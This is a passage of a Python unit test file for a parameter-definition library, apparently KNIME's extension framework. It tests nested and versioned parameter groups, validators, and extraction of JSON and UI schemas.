parameter must be positive.\")\n\n @subgroup.validator(override=False)\n def validate_subgroup(values, version=None):\n if values[\"first\"] + values[\"second\"] < 0:\n raise ValueError(\"The sum of the parameters must be non-negative.\")\n elif values[\"first\"] == 42:\n raise ValueError(\"Detected a forbidden number.\")\n\n\nclass Parameterized:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n double_param = kp.DoubleParameter(\"Double Parameter\", \"A double parameter\", 1.5)\n string_param = kp.StringParameter(\"String Parameter\", \"A string parameter\", \"foo\")\n multiline_string_param = 
kp.MultilineStringParameter(\n \"Multiline String Parameter\",\n \"A multiline string parameter\",\n \"foo\\nbar\",\n number_of_lines=5,\n )\n bool_param = kp.BoolParameter(\"Boolean Parameter\", \"A boolean parameter\", True)\n column_param = kp.ColumnParameter(\"Column Parameter\", \"A column parameter\")\n multi_column_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\",\n \"A multi column parameter\",\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\",\n \"A full multi column parameter\",\n )\n\n parameter_group = ParameterGroup()\n\n @string_param.validator\n def validate_string_param(value):\n if len(value) > 10:\n raise ValueError(f\"Length of string must not exceed 10!\")\n\n\nclass ParameterizedIndentation:\n indented_spaces_enum = kp.EnumParameter(\n label=\"Indented Enum Parameter\",\n description=\"\"\"\n Any Text\n \"\"\",\n default_value=\"txt\",\n )\n indented_tabs_enum = kp.EnumParameter(\n label=\"Indented Enum Parameter\",\n description=\"\"\"\n\\t\\tAny Text\n\\t\\t\"\"\",\n default_value=\"txt\",\n )\n\n\nclass ParameterizedWithOneGroup:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n double_param = kp.DoubleParameter(\"Double Parameter\", \"A double parameter\", 1.5)\n string_param = kp.StringParameter(\"String Parameter\", \"A string parameter\", \"foo\")\n bool_param = kp.BoolParameter(\"Boolean Parameter\", \"A boolean parameter\", True)\n column_param = kp.ColumnParameter(\"Column Parameter\", \"A column parameter\")\n multi_column_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\",\n \"A multi column parameter\",\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\",\n \"A full multi column parameter\",\n )\n parameter_group = NestedParameterGroup()\n\n @string_param.validator\n def validate_string_param(value):\n if len(value) > 10:\n raise ValueError(f\"Length of string must not exceed 10!\")\n\n\nclass ParameterizedWithAdvancedOption:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n int_advanced_param = kp.IntParameter(\n \"Int Parameter\", \"An integer parameter\", 3, is_advanced=True\n )\n\n double_param = kp.DoubleParameter(\"Double Parameter\", \"A double parameter\", 1.5)\n double_advanced_param = kp.DoubleParameter(\n \"Double Parameter\", \"A double parameter\", 1.5, is_advanced=True\n )\n\n string_param = kp.StringParameter(\"String Parameter\", \"A string parameter\", \"foo\")\n string_advanced_param = kp.StringParameter(\n \"String Parameter\", \"A string parameter\", \"foo\", is_advanced=True\n )\n multiline_string_param = kp.MultilineStringParameter(\n \"Multiline String Parameter\",\n \"A multiline string parameter\",\n \"foo\\nbar\",\n number_of_lines=5,\n )\n multiline_string_advanced_param = kp.MultilineStringParameter(\n \"Multiline String Parameter\",\n \"A multiline string parameter\",\n \"foo\\nbar\",\n number_of_lines=5,\n is_advanced=True,\n )\n bool_param = kp.BoolParameter(\"Boolean Parameter\", \"A boolean parameter\", True)\n bool_advanced_param = kp.BoolParameter(\n \"Boolean Parameter\", \"A boolean parameter\", True, is_advanced=True\n )\n\n column_param = kp.ColumnParameter(\"Column Parameter\", \"A column parameter\")\n column_advanced_param = kp.ColumnParameter(\n \"Column Parameter\", \"A column parameter\", is_advanced=True\n )\n\n multi_column_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\",\n \"A multi column parameter\",\n )\n 
multi_column_advanced_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\", \"A multi column parameter\", is_advanced=True\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\",\n \"A full multi column parameter\",\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\", \"A full multi column parameter\", is_advanced=True\n )\n parameter_group = ParameterGroup()\n parameter_group_advanced = ParameterGroupAdvanced()\n\n\nclass ParameterizedWithoutGroup:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n double_param = kp.DoubleParameter(\"Double Parameter\", \"A double parameter\", 1.5)\n string_param = kp.StringParameter(\"String Parameter\", \"A string parameter\", \"foo\")\n bool_param = kp.BoolParameter(\"Boolean Parameter\", \"A boolean parameter\", True)\n column_param = kp.ColumnParameter(\"Column Parameter\", \"A column parameter\")\n multi_column_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\",\n \"A multi column parameter\",\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\",\n \"A full multi column parameter\",\n )\n\n\n#### Secondary parameterised objects for testing composition: ####\n@kp.parameter_group(\"Parameter group to be used for multiple descriptor instances.\")\nclass ReusableGroup:\n first_param = kp.IntParameter(\n label=\"Plain int param\",\n description=\"Description of the plain int param.\",\n default_value=12345,\n )\n second_param = kp.IntParameter(\n label=\"Second int param\",\n description=\"Description of the second plain int param.\",\n default_value=54321,\n )\n\n @classmethod\n def create_default_dict(cls):\n return {\"first_param\": 12345, \"second_param\": 54321}\n\n\nclass ComposedParameterized:\n def __init__(self) -> None:\n # Instantiated here for brevety. 
Usually these would be supplied as arguments to __init__\n self.first_group = ReusableGroup()\n self.second_group = ReusableGroup()\n\n\n@kp.parameter_group(\"Nested composed\")\nclass NestedComposed:\n def __init__(self) -> None:\n self.first_group = ReusableGroup()\n self.second_group = ReusableGroup()\n\n @classmethod\n def create_default_dict(cls):\n return {\n \"first_group\": ReusableGroup.create_default_dict(),\n \"second_group\": ReusableGroup.create_default_dict(),\n }\n\n\nclass NestedComposedParameterized:\n def __init__(self) -> None:\n self.group = NestedComposed()\n\n @classmethod\n def create_default_dict(cls):\n return {\"model\": {\"group\": NestedComposed.create_default_dict()}}\n\n\n@kp.parameter_group(\"Nested group\")\nclass NestedNestedParameters:\n nested_root_param = kp.StringParameter(\n \"Nested root param\",\n \"Nested root param.\",\n \"blah\",\n )\n\n def __init__(self, new_value):\n self.nested_init_param = kp.StringParameter(\n \"Nested init param\",\n \"Nested init param.\",\n new_value,\n )\n\n\n@kp.parameter_group(\"Root group\")\nclass NestedParameters:\n group_root_param = kp.StringParameter(\n \"Group root param\",\n \"Group root param.\",\n \"blah\",\n )\n\n group_root_nested = NestedNestedParameters(\"blah\")\n\n def __init__(self, new_value):\n self.new_constructor_param = kp.StringParameter(\n \"Root group init param\",\n \"Root group init param.\",\n new_value,\n )\n self.group_init_nested = NestedNestedParameters(\"blah\")\n\n\nclass ComplexNestedComposedParameterized:\n root_param = kp.StringParameter(\"Root param\", \"Root param.\", \"blah\")\n\n root_group = NestedParameters(\"blah\")\n\n def __init__(self):\n self.init_group = NestedParameters(\"blah\")\n\n @classmethod\n def get_expected_params(cls):\n return {\n \"model\": {\n \"root_param\": \"blah\",\n \"root_group\": {\n \"group_root_param\": \"blah\",\n \"group_root_nested\": {\n \"nested_root_param\": \"blah\",\n \"nested_init_param\": \"blah\",\n },\n \"new_constructor_param\": \"blah\",\n \"group_init_nested\": {\n \"nested_root_param\": \"blah\",\n \"nested_init_param\": \"blah\",\n },\n },\n \"init_group\": {\n \"group_root_param\": \"blah\",\n \"group_root_nested\": {\n \"nested_root_param\": \"blah\",\n \"nested_init_param\": \"blah\",\n },\n \"new_constructor_param\": \"blah\",\n \"group_init_nested\": {\n \"nested_root_param\": \"blah\",\n \"nested_init_param\": \"blah\",\n },\n },\n }\n }\n\n\n@kp.parameter_group(\"Versioned parameter group\")\nclass VersionedParameterGroup:\n first = kp.IntParameter(\n label=\"First Parameter\",\n description=\"First parameter description\",\n default_value=1,\n since_version=\"0.2.0\",\n )\n second = kp.IntParameter(\n label=\"Second Parameter\",\n description=\"Second parameter description\",\n default_value=5,\n since_version=\"0.3.0\",\n )\n\n\nclass VersionedParameterized:\n # no since_version specified defaults to it being \"0.0.0\"\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n double_param = kp.DoubleParameter(\n \"Double Parameter\", \"A double parameter\", 1.5, since_version=\"0.1.0\"\n )\n string_param = kp.StringParameter(\n \"String Parameter\", \"A string parameter\", \"foo\", since_version=\"0.2.0\"\n )\n bool_param = kp.BoolParameter(\n \"Boolean Parameter\", \"A boolean parameter\", True, since_version=\"0.3.0\"\n )\n\n group = VersionedParameterGroup(since_version=\"0.2.0\")\n\n\n@kp.parameter_group(\"\", since_version=\"0.2.0\")\nclass VersionedDefaultsParameterGroup:\n first = 
kp.IntParameter(\n \"\",\n \"\",\n lambda v: -1 if v < kp.Version(0, 1, 0) else 1,\n )\n\n\nclass VersionedDefaultsParameterized:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n\n double_param = kp.DoubleParameter(\n \"Double Parameter\",\n \"\",\n lambda v: 1.5 if v >= kp.Version(0, 1, 0) else 0.5,\n since_version=\"0.2.0\",\n )\n\n group = VersionedDefaultsParameterGroup()\n\n\n#### Parameterised object for testing parameter groups with additional methods defined by the developer ####\n@kp.parameter_group(\"Inner group with a custom method\")\nclass InnerGroupWCustomMethod:\n inner_int_param = kp.IntParameter(\"Inner int\", \"Inner int parameter\", 2)\n inner_int_param2 = kp.IntParameter(\n \"Second inner int\", \"Second inner int parameter\", 2\n )\n\n def inner_foo(self):\n return self.inner_int_param + self.inner_int_param2 # 2 + 2 = 4\n\n def validate(self, values):\n if values[\"inner_int_param\"] != values[\"inner_int_param2\"]:\n raise ValueError(\"Inner int parameters should always be equal.\")\n\n\n@kp.parameter_group(\"Middle group with a custom method\")\nclass MiddleGroupWCustomMethod:\n middle_int_param = kp.IntParameter(\"Middle int\", \"Middle int parameter\", 1)\n inner_group = InnerGroupWCustomMethod()\n\n def middle_foo(self):\n return self.middle_int_param + self.inner_group.inner_foo() # 1 + (2 + 2) = 5\n\n\n@kp.parameter_group(\"Outer group with a custom method\")\nclass OuterGroupWCustomMethod:\n outer_int_param = kp.IntParameter(\"Outer int\", \"Outer int parameter\")\n middle_group = MiddleGroupWCustomMethod()\n\n def recursive_method(self, bar):\n if bar > 4:\n return self.middle_group.middle_foo() # 5\n else:\n return 1 + self.recursive_method(\n bar + 1\n ) # 1 + (1 + (1 + (1 + (1 + 5)))) = 10\n\n def nested_method(self):\n return self.middle_group.inner_group.inner_foo() # 4\n\n def _protected_method(self):\n return \"bar\"\n\n @middle_group.validator\n def validate_middle_group(values):\n if values[\"middle_int_param\"] > values[\"inner_group\"][\"inner_int_param\"]:\n raise ValueError(\n \"Middle parameter should be smaller than inner int parameter.\"\n )\n\n\nclass ParameterizedWithCustomMethods:\n outer_group = OuterGroupWCustomMethod()\n\n\n@kp.parameter_group(\n \"Subgroup that assigns values to params inside its constructor call\"\n)\nclass SubgroupWithConstructor:\n inner_param = kp.IntParameter(\"Param\", \"Param description.\", 12345)\n\n def __init__(self, param):\n self.inner_param = param\n\n\n@kp.parameter_group(\"Group that assigns values to params inside its constructor call\")\nclass GroupWithConstructor:\n param = kp.IntParameter(\"Param\", \"Param description.\", 12345)\n\n def __init__(self, param):\n self.param = param\n\n # a non-descriptor group\n self.subgroup = SubgroupWithConstructor(param=69)\n\n\nclass ParameterizedUsingConstructor:\n group = GroupWithConstructor(param=42)\n\n\n@kp.parameter_group(\"Subgroup with an inner class.\")\nclass SubgroupWithInnerClass:\n class InnerClass:\n attr_1 = 1\n attr_2 = 100\n\n @classmethod\n def _some_inner_method(cls):\n return cls.attr_2\n\n inner_param = kp.IntParameter(\"Inner param\", \"Inner param description.\", 12345)\n\n def __init__(self, param=InnerClass._some_inner_method()):\n self.inner_param = param + self.InnerClass.attr_1\n\n\n@kp.parameter_group(\"Group that calls its subgroup's inner class methods\")\nclass GroupCallingInnerClass:\n param = kp.IntParameter(\"Outer param\", \"Outer param description.\", 54321)\n\n # will call the InnerClass method 
as the default value in the constructor\n subgroup_1 = SubgroupWithInnerClass()\n\n def __init__(self, param):\n self.param = param\n\n # will call the InnerClass attribute to be added to the provided value\n self.subgroup_2 = SubgroupWithInnerClass(param=69)\n\n\nclass ParameterizedWithInnerClassGroups:\n group = GroupCallingInnerClass(param=SubgroupWithInnerClass.InnerClass.attr_1 + 41)\n\n\nclass ParameterizedWithDialogCreationContext:\n credential_param = kp.StringParameter(\n label=\"Credential param\",\n description=\"Choices is a callable\",\n choices=lambda a: kn.DialogCreationContext.get_credential_names(a),\n )\n flow_variable_param = kp.StringParameter(\n label=\"Flow variable param\",\n description=\"Call it a choice\",\n choices=lambda a: kn.DialogCreationContext.get_flow_variables(a),\n )\n\n\nclass TestEnumOptions(kp.EnumParameterOptions):\n FOO = (\"Foo\", \"The foo\")\n BAR = (\"Bar\", \"The bar\")\n BAZ = (\"Baz\", \"The baz\")\n\n\nclass ParameterizedWithEnumStyles:\n radio = kp.EnumParameter(\n \"radio\",\n \"Radio buttons\",\n TestEnumOptions.FOO,\n TestEnumOptions,\n style=kp.EnumParameter.Style.RADIO,\n )\n value_switch = kp.EnumParameter(\n \"value switch\",\n \"Value switch\",\n TestEnumOptions.FOO,\n TestEnumOptions,\n style=kp.EnumParameter.Style.VALUE_SWITCH,\n )\n dropdown = kp.EnumParameter(\n \"Dropdown\",\n \"dropdown\",\n TestEnumOptions.FOO,\n TestEnumOptions,\n style=kp.EnumParameter.Style.DROPDOWN,\n )\n default = kp.EnumParameter(\n \"Default\",\n \"The default (should be radio for fewer than 4 choices)\",\n TestEnumOptions.FOO,\n TestEnumOptions,\n )\n\n\nclass DummyDialogCreationContext:\n def __init__(self) -> None:\n class DummyJavaContext:\n def get_credential_names(self):\n return [\"foo\", \"bar\", \"baz\"]\n\n def get_credential(self, name):\n return \"dummy\"\n\n self._java_ctx = DummyJavaContext()\n self._flow_variables = [\"flow1\", \"flow2\", \"flow3\"]\n\n def get_input_specs(self):\n return [test_schema]\n\n\n#### Tests: ####\nclass ParameterTest(unittest.TestCase):\n def setUp(self):\n self.parameterized = Parameterized()\n self.parameterized_advanced_option = ParameterizedWithAdvancedOption()\n self.versioned_parameterized = VersionedParameterized()\n self.parameterized_without_group = ParameterizedWithoutGroup()\n self.parameterized_with_custom_methods = ParameterizedWithCustomMethods()\n self.parameterized_with_dialog_creation_context = (\n ParameterizedWithDialogCreationContext()\n )\n self.parameterized_with_indented_docstring = ParameterizedIndentation()\n\n self.maxDiff = None\n\n def test_forbidden_keywords_not_allowed(self):\n with self.assertRaises(SyntaxError):\n # we define these inside the test case since the error should be caused\n # when the parameter group class is initially parsed.\n @kp.parameter_group(\"Group with forbidden keyword arguments.\")\n class GroupWithForbiddenKwargs:\n param = kp.IntParameter(\"Simple param\", \"Simple param.\", 1)\n\n def __init__(self, since_version=\"foo\", normal_arg=1):\n self.param = normal_arg\n\n class ParameterizedWithForbiddenKwargs:\n group = GroupWithForbiddenKwargs(\"bar\", 10)\n\n def test_inner_classes_are_accessible(self):\n obj = ParameterizedWithInnerClassGroups()\n params = kp.extract_parameters(obj)\n expected = {\n \"model\": {\n \"group\": {\n \"param\": 42,\n \"subgroup_1\": {\"inner_param\": 101},\n \"subgroup_2\": {\"inner_param\": 70},\n }\n }\n }\n self.assertEqual(params, expected)\n self.assertEqual(obj.group.subgroup_1.InnerClass._some_inner_method(), 100)\n\n 
def test_parameter_group_constructors_set_values(self):\n obj = ParameterizedUsingConstructor()\n params = kp.extract_parameters(obj)\n expected = {\"model\": {\"group\": {\"param\": 42, \"subgroup\": {\"inner_param\": 69}}}}\n self.assertEqual(params, expected)\n\n def test_inject_with_version_dependent_defaults(self):\n obj = VersionedDefaultsParameterized()\n params = {\"model\": {\"int_param\": 5}}\n\n kp.inject_parameters(obj, params, \"0.0.0\")\n self.assertEqual(obj.int_param, 5)\n self.assertEqual(obj.double_param, 0.5)\n self.assertEqual(obj.group.first, -1)\n kp.inject_parameters(obj, params, \"0.1.0\")\n self.assertEqual(obj.int_param, 5)\n self.assertEqual(obj.double_param, 1.5)\n self.assertEqual(obj.group.first, 1)\n\n def test_init_versioned_default_on_get(self):\n kp.set_extension_version(\"0.2.0\")\n obj = VersionedDefaultsParameterized()\n self.assertEqual(obj.int_param, 3)\n self.assertEqual(obj.double_param, 1.5)\n self.assertEqual(obj.group.first, 1)\n\n #### Test central functionality: ####\n def test_getting_parameters(self):\n \"\"\"\n Test that parameter values can be retrieved.\n \"\"\"\n set_column_parameters(self.parameterized)\n\n # root-level parameters\n self.assertEqual(self.parameterized.int_param, 3)\n self.assertEqual(self.parameterized.double_param, 1.5)\n self.assertEqual(self.parameterized.string_param, \"foo\")\n self.assertEqual(self.parameterized.bool_param, True)\n self.assertEqual(self.parameterized.column_param, \"foo_column\")\n self.assertEqual(\n self.parameterized.multi_column_param, [\"foo_column\", \"bar_column\"]\n )\n self.assertEqual(\n self.parameterized.full_multi_column_param,\n kp.ColumnFilterConfig(\n manual_filter=kp.ManualFilterConfig(\n included=[\"foo_column\", \"bar_column\"]\n )\n ),\n )\n\n # group-level parameters\n self.assertEqual(self.parameterized.parameter_group.third, 3)\n\n # subgroup-level parameters\n self.assertEqual(self.parameterized.parameter_group.subgroup.first, 1)\n\n def test_setting_parameters(self):\n \"\"\"\n Test that parameter values can be set.\n \"\"\"\n # root-level parameters\n self.parameterized.int_param = 5\n self.parameterized.double_param = 5.5\n self.parameterized.string_param = \"bar\"\n self.parameterized.bool_param = False\n self.parameterized.column_param = \"foo_column\"\n self.parameterized.multi_column_param = [\"foo_column\", \"bar_column\"]\n\n # group-level parameters\n self.assertEqual(self.parameterized.int_param, 5)\n self.assertEqual(self.parameterized.double_param, 5.5)\n self.assertEqual(self.parameterized.string_param, \"bar\")\n self.assertEqual(self.parameterized.bool_param, False)\n self.assertEqual(self.parameterized.column_param, \"foo_column\")\n self.assertEqual(\n self.parameterized.multi_column_param, [\"foo_column\", \"bar_column\"]\n )\n\n # subgroup-level parameters\n self.parameterized.parameter_group.subgroup.first = 2\n self.assertEqual(self.parameterized.parameter_group.subgroup.first, 2)\n\n def test_extracting_parameters(self):\n \"\"\"\n Test extracting nested parameter values.\n \"\"\"\n set_column_parameters(self.parameterized)\n\n params = kp.extract_parameters(self.parameterized)\n expected = generate_values_dict()\n self.assertEqual(params, expected)\n\n def test_inject_parameters(self):\n params = generate_values_dict(\n 4,\n 2.7,\n \"bar\",\n \"bar\",\n False,\n \"foo_column\",\n [\"foo_column\", \"bar_column\"],\n kp.ColumnFilterConfig(\n manual_filter=kp.ManualFilterConfig(\n included=[\"foo_column\", \"bar_column\"]\n )\n ),\n 3,\n 2,\n 1,\n )\n\n 
kp.inject_parameters(self.parameterized, params)\n extracted = kp.extract_parameters(self.parameterized)\n self.assertEqual(params, extracted)\n\n def test_inject_parameters_with_missing_allowed(self):\n obj = Parameterized()\n params = {\"model\": {\"int_param\": 5}}\n\n kp.inject_parameters(obj, params)\n\n set_column_parameters(obj)\n\n extracted = kp.extract_parameters(obj)\n expected = generate_values_dict(5)\n self.assertEqual(expected, extracted)\n\n def test_extract_schema(self):\n expected = {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"int_param\": {\n \"title\": \"Int Parameter\",\n \"description\": \"An integer parameter\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"double_param\": {\n \"title\": \"Double Parameter\",\n \"description\": \"A double parameter\",\n \"type\": \"number\",\n \"format\": \"double\",\n },\n \"string_param\": {\n \"title\": \"String Parameter\",\n \"description\": \"A string parameter\",\n \"type\": \"string\",\n },\n \"multiline_string_param\": {\n \"title\": \"Multiline String Parameter\",\n \"description\": \"A multiline string parameter\",\n \"type\": \"string\",\n },\n \"bool_param\": {\n \"title\": \"Boolean Parameter\",\n \"description\": \"A boolean parameter\",\n \"type\": \"boolean\",\n },\n \"column_param\": {\n \"title\": \"Column Parameter\",\n \"description\": \"A column parameter\",\n \"type\": \"string\",\n },\n \"multi_column_param\": {\n \"title\": \"Multi Column Parameter\",\n \"description\": \"A multi column parameter\",\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n },\n \"full_multi_column_param\": {\n \"title\": \"Full Multi Column Parameter\",\n \"description\": \"A full multi column parameter\",\n \"type\": \"object\",\n \"properties\": {\n \"patternFilter\": {\n \"type\": \"object\",\n \"properties\": {\n \"isCaseSensitive\": {\n \"type\": \"boolean\",\n \"default\": True,\n },\n \"isInverted\": {\n \"type\": \"boolean\",\n \"default\": False,\n },\n \"pattern\": {\"type\": \"string\", \"default\": \"\"},\n },\n },\n \"typeFilter\": {\n \"type\": \"object\",\n \"properties\": {\n \"selectedTypes\": {\n \"default\": [],\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n },\n \"typeDisplays\": {\n \"default\": [],\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"id\": {\"type\": \"string\"},\n \"text\": {\"type\": \"string\"},\n },\n },\n },\n },\n },\n \"manualFilter\": {\n \"type\": \"object\",\n \"properties\": {\n \"includeUnknownColumns\": {\n \"type\": \"boolean\",\n \"default\": True,\n },\n \"manuallyDeselected\": {\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n \"default\": [],\n },\n \"manuallySelected\": {\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n \"default\": [],\n },\n },\n },\n \"mode\": {\n \"oneOf\": [\n {\"const\": \"MANUAL\", \"title\": \"Manual\"},\n {\"const\": \"REGEX\", \"title\": \"Regex\"},\n {\"const\": \"WILDCARD\", \"title\": \"Wildcard\"},\n {\"const\": \"TYPE\", \"title\": \"Type\"},\n ]\n },\n \"selected\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"configKeys\": [\"selected_Internals\"],\n },\n \"configKeys\": [\"selected_Internals\"],\n },\n },\n },\n \"parameter_group\": {\n \"type\": \"object\",\n \"properties\": {\n \"subgroup\": {\n \"type\": \"object\",\n \"properties\": {\n \"first\": {\n \"title\": \"First Parameter\",\n \"description\": \"First parameter description\",\n \"type\": 
\"integer\",\n \"format\": \"int32\",\n },\n \"second\": {\n \"title\": \"Second Parameter\",\n \"description\": \"Second parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n \"third\": {\n \"title\": \"Internal int Parameter\",\n \"description\": \"Internal int parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n },\n }\n },\n }\n extracted = kp.extract_schema(self.parameterized)\n self.assertEqual(expected, extracted)\n\n def test_extract_dialog_creation_context_parameters(self):\n # test credential names\n expected = {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"credential_param\": {\n \"title\": \"Credential param\",\n \"description\": \"Choices is a callable\",\n \"oneOf\": [\n {\"const\": \"foo\", \"title\": \"foo\"},\n {\"const\": \"bar\", \"title\": \"bar\"},\n {\"const\": \"baz\", \"title\": \"baz\"},\n ],\n },\n \"flow_variable_param\": {\n \"title\": \"Flow variable param\",\n \"description\": \"Call it a choice\",\n \"oneOf\": [\n {\"const\": \"flow1\", \"title\": \"flow1\"},\n {\"const\": \"flow2\", \"title\": \"flow2\"},\n {\"const\": \"flow3\", \"title\": \"flow3\"},\n ],\n },\n },\n }\n },\n }\n dummy_dialog = DummyDialogCreationContext()\n extracted = kp.extract_schema(\n self.parameterized_with_dialog_creation_context,\n dialog_creation_context=dummy_dialog,\n )\n\n self.assertEqual(expected, extracted)\n\n def test_extract_ui_schema(self):\n expected = {\n \"type\": \"VerticalLayout\",\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/int_param\",\n \"type\": \"Control\",\n \"label\": \"Int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/double_param\",\n \"type\": \"Control\",\n \"label\": \"Double Parameter\",\n \"options\": {\"format\": \"number\"},\n },\n {\n \"scope\": \"#/properties/model/properties/string_param\",\n \"type\": \"Control\",\n \"label\": \"String Parameter\",\n \"options\": {\"format\": \"string\"},\n },\n {\n \"scope\": \"#/properties/model/properties/multiline_string_param\",\n \"type\": \"Control\",\n \"label\": \"Multiline String Parameter\",\n \"options\": {\"format\": \"textArea\", \"rows\": 5},\n },\n {\n \"scope\": \"#/properties/model/properties/bool_param\",\n \"type\": \"Control\",\n \"label\": \"Boolean Parameter\",\n \"options\": {\"format\": \"boolean\"},\n },\n {\n \"scope\": \"#/properties/model/properties/column_param\",\n \"type\": \"Control\",\n \"label\": \"Column Parameter\",\n \"options\": {\n \"format\": \"dropDown\",\n \"showRowKeys\": False,\n \"showNoneColumn\": False,\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/multi_column_param\",\n \"type\": \"Control\",\n \"label\": \"Multi Column Parameter\",\n \"options\": {\n \"format\": \"twinList\",\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"scope\": \"#/properties/model/properties/full_multi_column_param\",\n \"type\": \"Control\",\n \"label\": \"Full Multi Column Parameter\",\n \"options\": {\n \"format\": \"columnFilter\",\n \"showSearch\": True,\n \"showMode\": True,\n \"possibleValues\": test_possible_values,\n },\n },\n {\n \"type\": \"Section\",\n \"label\": \"Primary Group\",\n \"options\": {},\n \"elements\": [\n {\n \"type\": \"Group\",\n \"label\": \"Subgroup\",\n \"options\": {},\n \"elements\": [\n {\n \"scope\": 
\"#/properties/model/properties/parameter_group/properties/subgroup/properties/first\",\n \"type\": \"Control\",\n \"label\": \"First Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/subgroup/properties/second\",\n \"type\": \"Control\",\n \"label\": \"Second Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"scope\": \"#/properties/model/properties/parameter_group/properties/third\",\n \"type\": \"Control\",\n \"label\": \"Internal int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n ],\n }\n extracted = kp.extract_ui_schema(\n self.parameterized, DummyDialogCreationContext()\n )\n self.assertEqual(expected, extracted)\n\n def test_enum_styles(self):\n expected = {\n \"type\": \"VerticalLayout\",\n \"elements\": [\n {\n \"type\": \"Control\",\n \"label\": \"radio\",\n \"scope\": \"#/properties/model/properties/radio\",\n \"options\": {\"format\": \"radio\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"value switch\",\n \"scope\": \"#/properties/model/properties/value_switch\",\n \"options\": {\"format\": \"valueSwitch\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"Dropdown\",\n \"scope\": \"#/properties/model/properties/dropdown\",\n \"options\": {\"format\": \"string\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"Default\",\n \"scope\": \"#/properties/model/properties/default\",\n \"options\": {\"format\": \"radio\"},\n },\n ],\n }\n extracted = kp.extract_ui_schema(\n ParameterizedWithEnumStyles(), DummyDialogCreationContext()\n )\n self.assertEqual(expected, extracted)\n\n def test_extract_ui_schema_is_advanced_option(self):\n expected = {\n \"type\": \"VerticalLayout\",\n \"elements\": [\n {\n \"scope\": \"#/properties/model/properties/int_param\",\n \"type\": \"Control\",\n \"label\": \"Int Parameter\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"scope\": \"#/properties/model/properties/int_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Int Parameter\",\n \"options\": {\"format\": \"integer\", \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/double_param\",\n \"type\": \"Control\",\n \"label\": \"Double Parameter\",\n \"options\": {\"format\": \"number\"},\n },\n {\n \"scope\": \"#/properties/model/properties/double_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Double Parameter\",\n \"options\": {\"format\": \"number\", \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/string_param\",\n \"type\": \"Control\",\n \"label\": \"String Parameter\",\n \"options\": {\"format\": \"string\"},\n },\n {\n \"scope\": \"#/properties/model/properties/string_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"String Parameter\",\n \"options\": {\"format\": \"string\", \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/multiline_string_param\",\n \"type\": \"Control\",\n \"label\": \"Multiline String Parameter\",\n \"options\": {\"format\": \"textArea\", \"rows\": 5},\n },\n {\n \"scope\": \"#/properties/model/properties/multiline_string_advanced_param\",\n \"type\": \"Control\",\n \"label\": \"Multiline String Parameter\",\n \"options\": {\"format\": \"textArea\", \"rows\": 5, \"isAdvanced\": True},\n },\n {\n \"scope\": \"#/properties/model/properties/bool_param\",\n \"type\": \"Control\",\n \"label\": \"Boolean Parameter\",\n \"options\": {\"format\": \"boolean\"},\n },\n {\n \"scope\": 
